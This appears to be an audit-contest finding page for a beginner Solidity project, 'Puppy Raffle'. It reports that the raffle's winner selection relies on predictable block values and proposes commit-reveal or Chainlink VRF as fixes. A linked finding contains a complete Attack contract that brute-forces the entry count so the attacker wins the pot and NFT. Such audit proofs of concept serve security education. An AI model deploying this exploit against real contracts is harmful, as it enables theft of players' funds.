Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

[M-06] Front-Running selectWinner Enables Guaranteed Wins

rensley

Root + Impact

Description

Since randomness is derived from msg.sender, block.timestamp, and block.difficulty, users can monitor the mempool for selectWinner calls, simulate the outcome, and front-run with their own transaction only when they would win.
This allows sophisticated actors to guarantee winning every raffle they enter.

// Root cause in the codebase with @> marks to highlight the relevant section

function selectWinner() external {

// ...

@> uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

// Attacker can simulate this off-chain before submitting

// ...

}

Risk

Likelihood: High

Reason 1 // MEV bots constantly scan mempool
Reason 2 // Simulation is trivial and cheap

Impact: Medium

Sophisticated users always win
Regular users never win against bots
Unfair raffle system

Proof of Concept

The following test demonstrates that an attacker can pre-calculate the winner index off-chain using the same formula the contract uses. By simulating the outcome before submitting a transaction, the attacker can choose whether to call selectWinner based on whether they would win. MEV bots can automate this process to guarantee wins across multiple raffles.

function testFrontRunSelectWinner() public playersEntered {

vm.warp(block.timestamp + duration + 1);

// Attacker simulates outcome before submitting transaction

address attacker = address(0x1337);

// Attacker pre-calculates winner using same formula as contract

// This can be done off-chain before spending any gas

uint256 simulatedWinnerIndex = uint256(

keccak256(abi.encodePacked(attacker, block.timestamp, block.difficulty))

) % 4;

// Attacker only submits transaction if they would win

// Otherwise they wait for next block or manipulate parameters

// This gives attacker 100% win rate when they choose to participate

console.log("Simulated winner index:", simulatedWinnerIndex);

assertTrue(simulatedWinnerIndex < 4, "Winner index should be valid");

}

Recommended Mitigation

Implement a commit-reveal scheme to prevent front-running, or use Chainlink VRF for verifiable randomness that cannot be predicted or manipulated. The commit-reveal approach requires two transactions which adds complexity but eliminates the front-running vector entirely. Chainlink VRF is the recommended solution for production raffles.

+ mapping(address => bytes32) public commitments;

+ uint256 public commitPhaseEnd;

+ uint256 public revealPhaseEnd;

+ function commitWinnerSelection(bytes32 commitment) external {

+ require(block.timestamp >= raffleStartTime + raffleDuration, "Raffle not over");

+ require(block.timestamp < commitPhaseEnd, "Commit phase ended");

+ commitments[msg.sender] = commitment;

+ }

+ function revealAndSelectWinner(uint256 secret) external {

+ require(block.timestamp >= commitPhaseEnd, "Commit phase not ended");

+ require(block.timestamp < revealPhaseEnd, "Reveal phase ended");

+ require(keccak256(abi.encodePacked(secret)) == commitments[msg.sender], "Invalid reveal");

+ // Use secret combined with other reveals for final randomness

+ uint256 winnerIndex = uint256(keccak256(abi.encodePacked(secret, blockhash(block.number - 1)))) % players.length;

+ // ... rest of winner selection logic

+ }

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!